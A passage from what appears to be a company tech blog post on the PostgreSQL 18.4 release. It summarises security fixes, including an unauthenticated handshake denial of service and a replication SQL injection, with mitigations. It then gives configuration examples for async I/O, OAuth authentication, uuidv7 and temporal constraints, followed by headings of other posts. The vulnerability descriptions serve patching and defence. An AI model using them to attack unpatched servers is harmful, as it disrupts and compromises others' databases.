Third is the no-auth-required DoS in CVE-2026-6479. An attacker who can reach the PostgreSQL socket can send a specific sequence of messages during the SSL/GSS handshake; the handler then loops into unbounded recursion, exhausts stack space, kills backend processes, and in the worse case exhausts the backend slot pool — preventing legitimate users from connecting. RDS instances exposed to the internet on port 5432 with only VPC peering / IP allowlist as guardrails, or misconfigured NodePort services, are the highest-risk targets. Short-term mitigation: restrict hostssl and hostgssenc lines in pg_hba.conf to trusted CIDRs; permanent fix: patch to 18.4 / 17.10 / 16.14 / 15.18 / 14.23.

2.4 CVE-2026-6476 — ALTER SUBSCRIPTION REFRESH PUBLICATION SQL Injection

Fourth is an SQL injection in logical replication. When ALTER SUBSCRIPTION ... REFRESH PUBLICATION runs, the subscriber re-fetches the publisher's table list and interpolates schema/relation names into SQL commands without quoting. A subscriber owner who can control the publisher-side object names could execute arbitrary SQL on the publisher. 18.4 applies quote_ident() consistently when constructing those commands. Multi-tenant SaaS environments that separate publications per customer need to patch immediately.

3. PostgreSQL 18's Async I/O — Measured Differences Between io_method Options

The biggest architectural change in PostgreSQL 18 is the async I/O (AIO) subsystem. Through 17, backend processes read disk pages synchronously — a page cache miss stalled the entire backend. 18 introduces the io_method parameter so operators can choose between three dispatch strategies.

`io_method`	Behavior	Prerequisite	Typical Effect (Read-Heavy)
`sync`	Synchronous reads, same as pre-18	None	Baseline
`worker` (default)	Offload I/O to a dedicated worker process pool	None (all OS)	+20–30% on local SSD, +50–150% on network storage
`io_uring`	Direct use of Linux 5.1+ `io_uring` kernel interface	Linux 5.1+, build with `--with-liburing`	Lower CPU overhead vs worker, +0–50% throughput depending on workload

3.1 Step 1: io_method=worker — Safe in Almost Every Environment

The safest first step is io_method=worker. It runs on every OS, doesn't care about kernel version, and doesn't require special build flags. A dedicated worker pool issues page prefetches and the backend polls for results. The effect is largest on network storage (AWS EBS, GCP Persistent Disk, Azure Managed Disk). classmethod's RDS PostgreSQL 18 benchmark showed worker mode delivering roughly 2–3x the sequential-scan read throughput of sync. On local NVMe SSDs, where responses are already microsecond-class, the gain is closer to +20%.

# postgresql.conf — recommended baseline for io_method=worker
io_method = worker            # default. enabled automatically in 18
io_workers = 3                # worker process count, default 3
                              # ⚠️ note: changing requires PostgreSQL restart
effective_io_concurrency = 16 # bump prefetch depth alongside AIO
maintenance_io_concurrency = 32

# Monitoring: dispatched I/O count from pg_stat_io view
# SELECT * FROM pg_stat_io WHERE backend_type = 'io worker';

3.2 Step 2: io_method=io_uring — CPU Efficiency on Linux 5.1+

Once your workload stabilizes, the next step is io_uring. Binaries built with ./configure --with-liburing (or official RHEL/Ubuntu packages) on Linux 5.1+ can enable it. io_uring places a shared ring buffer between PostgreSQL and the kernel, cutting syscall overhead. Because no worker pool is needed, CPU usage drops vs worker mode, and high-concurrency OLTP workloads can squeeze additional throughput out. But container runtimes that block io_uring syscalls via seccomp (Docker's default seccomp profile, some GKE Autopilot nodes) will fail immediately.

# 1) Check kernel version
uname -r   # must be 5.1+, 6.x recommended

# 2) Verify liburing build option
psql -c "SHOW server_version;"
psql -c "SELECT name, setting FROM pg_settings WHERE name = 'io_method';"
#  → 'io_uring' should appear as an allowed enum value

# 3) Update postgresql.conf
echo 'io_method = io_uring' >> /etc/postgresql/18/main/postgresql.conf
systemctl restart postgresql@18-main

# 4) Verify io_uring dispatch from pg_stat_io
psql -c "SELECT * FROM pg_stat_io WHERE backend_type = 'client backend';"

3.3 Scope and Limits of AIO

A key constraint: PostgreSQL 18 AIO is read-only. WAL writes and checkpoint dirty-page flushes still take the synchronous path. The result is (a) read-heavy analytic workloads see the largest gains from sequential and index scans, while (b) write-heavy OLTP barely moves. shared_buffers and effective_cache_size also need to be tuned for the workload — if pages get evicted immediately after prefetch, AIO can't help.

4. OAuth 2.0 Native Authentication — Direct IdP Integration in pg_hba.conf

The second major change in 18 is that OAuth 2.0 authentication is a first-class method in pg_hba.conf. Previously the choices were LDAP, RADIUS, SSPI, PAM — for OAuth you needed an external auth proxy like pgbouncer-rr-patch or aws_iam. 18 adds oauth as a method so PostgreSQL itself validates tokens against IdPs (Okta, Microsoft Entra ID, Keycloak, Auth0, Google).

4.1 pg_hba.conf Baseline Patterns

# /etc/postgresql/18/main/pg_hba.conf
# TYPE   DATABASE   USER   ADDRESS        METHOD   OPTIONS

# OAuth — Keycloak realm 'manoit'
hostssl  myapp      all    10.0.0.0/8     oauth    issuer="https://idp.manoit.co.kr/realms/manoit" scope="openid profile email" map=oauth_map

# OAuth — Microsoft Entra ID (tenant ID required, custom scope)
hostssl  analytics  all    10.0.0.0/8     oauth    issuer="https://login.microsoftonline.com/{tenant-id}/v2.0" scope="api://{client-id}/.default" map=oauth_map

# OAuth — Okta org
hostssl  reporting  all    10.0.0.0/8     oauth    issuer="https://manoit.okta.com/oauth2/default" scope="openid offline_access" map=oauth_map

# Keep scram-sha-256 as backward-compat (emergency access)
hostssl  all        admin  10.0.0.0/8     scram-sha-256

Key parameters:

issuer= — IdP issuer URL. OAuth is strict about issuer matching down to case and trailing slashes.
scope= — Requested scope. Entra ID's default scope does not work; you need a custom one like api://{client-id}/.default.
map= — A mapping name in pg_ident.conf that converts external identity (alice@manoit.co.kr) into a PostgreSQL role (alice).

4.2 pg_ident.conf Mapping Patterns

# /etc/postgresql/18/main/pg_ident.conf
# MAPNAME       SYSTEM-USERNAME              PG-USERNAME

oauth_map       /^(.+)@manoit\.co\.kr$       \1
oauth_map       alice@partner.com            partner_alice
oauth_map       admin@manoit\.co\.kr         postgres   # superuser mapping
oauth_map       /^svc-(.+)@manoit\.co\.kr$   svc_\1     # service account pattern

4.3 Validator Module Is Required

Important: PostgreSQL 18 core ships without an OAuth validator. Core provides the protocol handler and token validation framework; actual signature verification and claim mapping happen in a separate module. Percona's pg_oidc_validator is the most widely used open-source option, while commercial distributions (EnterpriseDB, Crunchy Data) bundle their own.

# postgresql.conf — load the validator library
oauth_validator_libraries = 'pg_oidc_validator'

# pg_oidc_validator.conf (module-specific settings)
[manoit]
issuer       = "https://idp.manoit.co.kr/realms/manoit"
jwks_uri     = "https://idp.manoit.co.kr/realms/manoit/protocol/openid-connect/certs"
audience     = "postgresql"
require_iss  = true
require_aud  = true
clock_skew_seconds = 60

4.4 Client Connection

# libpq 19+ (or PostgreSQL 18 client)
psql "postgres://alice@db.manoit.co.kr:5432/myapp?\
  oauth_issuer=https://idp.manoit.co.kr/realms/manoit&\
  oauth_client_id=postgres-client&\
  sslmode=require"
# A device-code or PKCE authorization-code flow opens in the browser.
# Once issued, the token is forwarded to the PostgreSQL backend for validation.

5. UUIDv7 — Timestamp-Ordered UUIDs as a First-Class Citizen

UUIDs have become the standard for index-friendly IDs, but classical UUIDv4 is fully random — every new key dirties a different page in the B-Tree, inflating WAL and cache misses. 18 adds uuidv7() as a standard function. UUIDv7 packs Unix epoch milliseconds into the first 48 bits and random into the rest, producing UUIDs that are sorted by time.

Strategy	Distribution	Hot Index Pages	WAL Burden	Read Cache Hit Rate
`uuidv4()`	Fully random	Spread across all pages	High (all pages dirtied)	Low
`uuidv7()`	Time-ordered	Concentrated on latest pages	Low (localized writes)	High
`bigserial`	Increasing integer	Concentrated on latest pages	Low	High

-- Use uuidv7() as a PK default in PostgreSQL 18
CREATE TABLE orders (
  id          UUID PRIMARY KEY DEFAULT uuidv7(),   -- ← 18 new
  customer_id BIGINT NOT NULL,
  amount      NUMERIC(12,2) NOT NULL,
  created_at  TIMESTAMPTZ NOT NULL DEFAULT now()
);

-- Extract the embedded timestamp from a UUIDv7
SELECT id,
       uuid_extract_timestamp(id) AS embedded_ts,
       created_at,
       uuid_extract_timestamp(id) - created_at AS skew
FROM   orders
ORDER  BY id DESC
LIMIT  5;

-- A schema pattern using uuidv7() to drop a redundant 'now()' column:
-- you can extract the timestamp from id itself, so created_at can be omitted.

Caveat: uuidv7() is approximately sorted, not strictly. UUIDs issued in the same millisecond are differentiated only by their random suffix, so high-throughput workloads still see some page fragmentation. Still, index cache hit rates typically improve by 10–30 percentage points over UUIDv4.

6. Virtual Generated Columns — Computed Columns as the New Default

PostgreSQL 12 introduced stored generated columns that materialize values on disk. 18 adds virtual generated columns and makes virtual the default. Virtual columns compute at query time, so they don't take disk space, and changing the expression doesn't trigger a table rewrite.

-- In 18, GENERATED ALWAYS AS ... VIRTUAL is the default
CREATE TABLE invoices (
  id           UUID PRIMARY KEY DEFAULT uuidv7(),
  subtotal     NUMERIC(12,2) NOT NULL,
  tax_rate     NUMERIC(5,4)  NOT NULL DEFAULT 0.10,
  -- VIRTUAL is implicit, keyword optional
  total        NUMERIC(12,2) GENERATED ALWAYS AS (subtotal * (1 + tax_rate)) STORED, -- ← STORED explicit
  total_v      NUMERIC(12,2) GENERATED ALWAYS AS (subtotal * (1 + tax_rate))         -- ← VIRTUAL default
);

-- STORED vs VIRTUAL: only STORED can be indexed today
CREATE INDEX idx_invoices_total ON invoices(total);
-- VIRTUAL: not indexable in 18 (under review for 19)
-- If you need an index, declare STORED explicitly.

7. Temporal Constraints — WITHOUT OVERLAPS and PERIOD

PostgreSQL 18 brings SQL-standard temporal constraints for data that has a time dimension: hotel reservations, employee tenure periods, contract validity windows.

7.1 WITHOUT OVERLAPS — Period Non-Overlap

-- Hotel reservation: bookings for the same room must not overlap in time
CREATE TABLE reservations (
  room_id    INT,
  period     daterange NOT NULL,
  guest_name TEXT,
  -- 18 new: WITHOUT OVERLAPS on the period column
  PRIMARY KEY (room_id, period WITHOUT OVERLAPS)
);

-- Overlapping attempt — previously required a custom trigger
INSERT INTO reservations VALUES (101, daterange('2026-06-01','2026-06-05'), 'Alice');
INSERT INTO reservations VALUES (101, daterange('2026-06-03','2026-06-07'), 'Bob');
-- ERROR: conflicting key value violates exclusion constraint "reservations_pkey"

7.2 PERIOD — Temporal Foreign Key

-- Employee tenure: each employee's dept_id must reference a valid department
-- whose period contains the employee period.
CREATE TABLE departments (
  dept_id   INT,
  period    daterange NOT NULL,
  dept_name TEXT,
  PRIMARY KEY (dept_id, period WITHOUT OVERLAPS)
);

CREATE TABLE employee_history (
  emp_id    INT,
  period    daterange NOT NULL,
  dept_id   INT NOT NULL,
  PRIMARY KEY (emp_id, period WITHOUT OVERLAPS),
  -- 18 new: temporal foreign key using PERIOD
  FOREIGN KEY (dept_id, PERIOD period) REFERENCES departments (dept_id, PERIOD period)
);

-- ⚠️ note: temporal FKs do not yet support RESTRICT / CASCADE /
-- SET NULL / SET DEFAULT on ON DELETE or ON UPDATE — only NO ACTION

Implementation detail: temporal constraints use GiST indexes internally, so they're larger than B-Tree indexes. And because ON DELETE/UPDATE actions are limited, treat temporal FK enforcement as "partially restricted relative to the SQL standard" when adopting them.

8. ManoIT Internal Cluster Verification Checklist

The 12-step sequence ManoIT applied to internal RDS PostgreSQL 18 (18.1 → 18.4) plus on-prem 18 clusters, alongside the io_method transition and OAuth rollout:

Step	Target	Verification Command / Action	Expected Outcome
1	refint triggers	Run the SQL from §2.1	0 rows expected; if any, migrate immediately
2	MD5 users	Run the SQL from §2.2	All should be scram-sha-256
3	SSL/GSS exposure	Review `hostssl` / `hostgssenc` CIDRs in `pg_hba.conf`	No internet-wide (0.0.0.0/0) rules
4	Logical replication owner	`SELECT subname, subowner::regrole FROM pg_subscription;`	Confirm subscriber owners are known roles
5	Apply 18.4 patch	RDS: in-place minor upgrade to 18.4 during maintenance window; on-prem: `apt install postgresql-18=18.4-1`	Confirm version 18.4, all extensions compatible
6	`io_method` transition	Keep `worker` or switch to `io_uring` (kernel 5.1+)	Increased dispatch counts in `pg_stat_io`
7	OAuth pg_hba.conf	Apply §4.1–4.3 and `pg_reload_conf()`	Keep scram-sha-256 line for emergency access
8	Adopt uuidv7()	Change new tables' PK to `DEFAULT uuidv7()`; existing tables go dual-column	Watch index cache hit rate
9	Virtual Generated Columns	Only keep STORED where indexes are required	Confirm table size decrease
10	Temporal Constraints PoC	Adopt `WITHOUT OVERLAPS` in reservation/contract domains	Unit-test rejecting overlapping INSERTs
11	Standby replication	Patch streaming replicas to 18.4, monitor lag	Lag returns to <1s
12	Rollback plan	18.4 → 18.3 downgrade is unsupported → verify base-backup restore plan	Confirm 30-day PITR window

9. Closing — The New Defaults 18.4 Sets

PostgreSQL 18.4 is a release where "major security patches and the future authentication / identification / temporal model both arrive in stable form". Among the 11 CVEs, the refint RCE (CVE-2026-6637), the SSL/GSS DoS (CVE-2026-6479), and the logical-replication SQL injection (CVE-2026-6476) demand patching now. The major-18 features — io_method=worker (default) → io_uring (Linux 5.1+), native OAuth 2.0, uuidv7(), Virtual Generated Columns, Temporal Constraints — are now the starting point for 2026 H2 new schemas.

ManoIT's recommended operational sequence: (1) apply the security patches across every supported track (14.23, 15.18, 16.14, 17.10, 18.4) within seven days; (2) audit and remove the three risk patterns — refint, MD5 authentication, unrestricted SSL/GSS exposure; (3) keep io_method=worker as a baseline and switch to io_uring on Linux 5.1+ workloads; (4) design new services starting with OAuth 2.0 authentication + uuidv7() + Virtual Generated Columns; (5) introduce WITHOUT OVERLAPS and PERIOD for reservation, contract, and history tables where the time dimension matters. The database is no longer "an engine that runs SQL" — it's now an enterprise security control point that standardizes authentication, identification, the time dimension, and the I/O model together.

This post was co-authored by Anthropic Claude (Opus 4.6) and the ManoIT engineering team. PostgreSQL 18.4 release notes and security advisories from postgresql.org are primary sources. ManoIT internal verification results are provided as reference and should not be generalized. Please credit the source when citing or republishing.

Originally published at ManoIT Tech Blog.

DEV Community: daniel jeong

NestJS 12 Deep Dive — Full ESM Migration, Standard Schema Route Validation, and the Vitest·oxlint·Rspack Toolchain

1. NestJS 12 at a Glance

2. Why ESM Now — require(esm) Stability as the Premise

3. Standard Schema — Beyond class-validator

3.1 What Is Standard Schema?

3.2 In Practice — Route Validation with a Zod Schema

4. Toolchain Modernization — Rust Arrives

4.1 Jest → Vitest (+ OXC)

4.2 ESLint → oxlint, Webpack → Rspack

5. Other Changes

6. Preparing to Migrate — ManoIT's Recommended Strategy

7. Closing — The ESM Era for Backend Frameworks

Inside the Trivy Supply Chain Compromise (CVE-2026-33634): 76 Hijacked Tags, Runner.Worker Memory Secret Theft & SHA Pinning

1. What Happened — When a Security Tool Becomes the Weapon

2. Root Cause — Non-Atomic Credential Rotation

3. Breaking Down the Attack

3.1 trivy-action Tag Hijacking — @v0.34.0 Is a Pointer, Not a Contract

3.2 Forging the v0.69.4 Binary — goreleaser --skip=validate

3.3 The Payload — Reading Secrets Straight Out of Runner.Worker Memory

4. Affected vs. Safe Versions

5. Detection & Response Playbook

6. The Real Fix — SHA Pinning and Immutable Releases

7. How ManoIT Responded Internally

8. Closing — Your Security Tools Are Part of Your Attack Surface

OpenTofu 1.12.0: Dynamic prevent_destroy, destroy=false, Identity Import & Provider Checksum Automation

1. Why OpenTofu 1.12 Now — From Fork to Its Own Track

2. Dynamic prevent_destroy — Per-Environment Delete Protection via Variables

3. destroy = false — Remove From State Without Destroying the Remote Object

4. Resource Identity Import — From Guessing IDs to Schema-Based

5. Provider Checksum & Install Improvements — The End of tofu providers lock

6. Simultaneous Output (-json-into) and Observable IaC

7. Deprecations — WinRM Provisioners and 32-bit

8. Cumulative Changes: 1.10 -> 1.12

9. ManoIT Internal Adoption Checklist

10. Conclusion — "The Next IaC Challenge Isn't Creation, It's Lifecycle"

Argo CD 3.4 Deep Dive: Cluster Pause Reconciliation, Helm valueFiles Globs & Source Hydrator Commit Authorship

1. Why 3.4 — Quarterly Cadence, Center of Gravity Shifts to Day-2

2. Per-Cluster Pause Reconciliation — A New Standard for Incident Response

3. Helm valueFiles Wildcard Globs — Taming the values File Explosion

4. Source Hydrator — Commit Authorship and UI Integration

5. ApplicationSet Operability — Health Field, Watch, listResourceEvents

6. Notification & Networking — appProject Access and gRPC DNS TXT Opt-Out

7. Upgrade Watch-Outs — Helm 3.19 K8s Version Interpretation, Dex 2.45, MS Teams O365 Connectors

8. ManoIT Internal Adoption Checklist

9. Conclusion — "The Next GitOps Challenge Isn't Deployment, It's Operations"

LangGraph 1.2 Deep Dive — Per-Node Timeouts, Error Handlers, Graceful Shutdown, DeltaChannel & Streaming v3

1. Why 1.2 — 1.0's durability, 1.1's type safety, 1.2's node control

2. Per-node timeouts — the decisive difference between run_timeout and idle_timeout

3. Node-level error handlers — first-class Saga / compensation

4. Graceful shutdown — deploy without losing state

5. DeltaChannel — cut long-thread checkpoint cost to increments

6. Streaming API v3 — content-block-centric, typed projections

7. The ecosystem — langchain 1.3 and deepagents 0.6 shipped the same day

8. ManoIT internal adoption checklist

9. Conclusion — "an agent isn't a function; it's a durable graph that dies and revives per node"

GitHub Spec Kit Deep Dive — Spec-Driven Development, the Constitution, /speckit.* Slash Commands, and the Specify CLI for Taming AI Coding Agents

1. Why Spec-Driven Development in 2026

2. Specify CLI — install and bootstrap

3. The Constitution — lock non-negotiables before any code

4. The core workflow — /speckit.* slash commands

4.1 Core commands

4.2 Optional commands — the quality gates

5. Extensions and presets — organizational customization

6. Limits and operational caveats — "the spec is perfect, the code is empty"

7. ManoIT internal rollout checklist

8. Conclusion — "intent before code, constitution above the agent"

Next.js 16 Deep Dive — Cache Components with use cache, Turbopack as the Default Bundler, middleware to proxy.ts, and 16.2's AI-Native DevTools

Next.js 16 Deep Dive — Cache Components with use cache, Turbopack as the Default Bundler, middleware → proxy.ts, and 16.2's AI-Native DevTools Redefining the 2026 React Full-Stack Standard

TL;DR

1. Why May 2026's Next.js 16 matters

2. Cache Components — ending implicit caching with use cache

3. Turbopack stable — default bundler + filesystem caching

4. proxy.ts — the end of middleware.ts and a clearer network boundary

5. Improved caching APIs — revalidateTag, updateTag, refresh

6. React 19.2 + React Compiler — View Transitions, Activity, automatic memoization

7. Routing & navigation overhaul — layout dedup + incremental prefetch

8. 16.1 & 16.2 — toward an AI-native framework

9. Migration decisions — breaking changes and flow

10. ManoIT internal adoption checklist

3.1 trivy-action Tag Hijacking — `@v0.34.0` Is a Pointer, Not a Contract

3.2 Forging the v0.69.4 Binary — goreleaser `--skip=validate`

2.2 The v2.3 Fix — Share Code via `crossplane internal render`

3.2 v2.3 — Auto-Create `ClusterUsage` to Block Provider DELETE